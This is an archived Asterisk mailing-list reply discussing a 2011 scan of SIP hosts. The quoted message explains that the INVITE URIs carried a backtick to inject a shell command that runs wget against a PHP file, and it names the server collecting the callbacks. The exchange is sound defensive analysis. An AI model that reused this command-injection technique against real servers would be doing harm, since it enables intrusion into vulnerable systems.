[asterisk-users] new sort of shell attack attempt via SIP?

Alex Balashov abalashov at evaristesys.com
Sun Sep 11 18:46:09 CDT 2011


On 09/11/2011 07:35 PM, Tom Browning wrote:
> I disagree with the 'review CDR' angle for a number of reasons:
>
> a) there is a backtick in the URI trying to force shell and the proper
> wget command line to send results to /dev/null
> b) the V.php (at the url) appears to do nothing at all and might just
> be empty (for log scraping), url safety checks confirm
> c) the invites were sprayed across my entire IP address range
>
> To me, this is more like a scan for any SIP host that has shell
> injection vulerability.  The list of vulnerable hosts is just a log
> scrape away at the server 91.223.89.94

On second thought, your interpretation does make much more sense.  :-)


-- 
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/



More information about the asterisk-users mailing list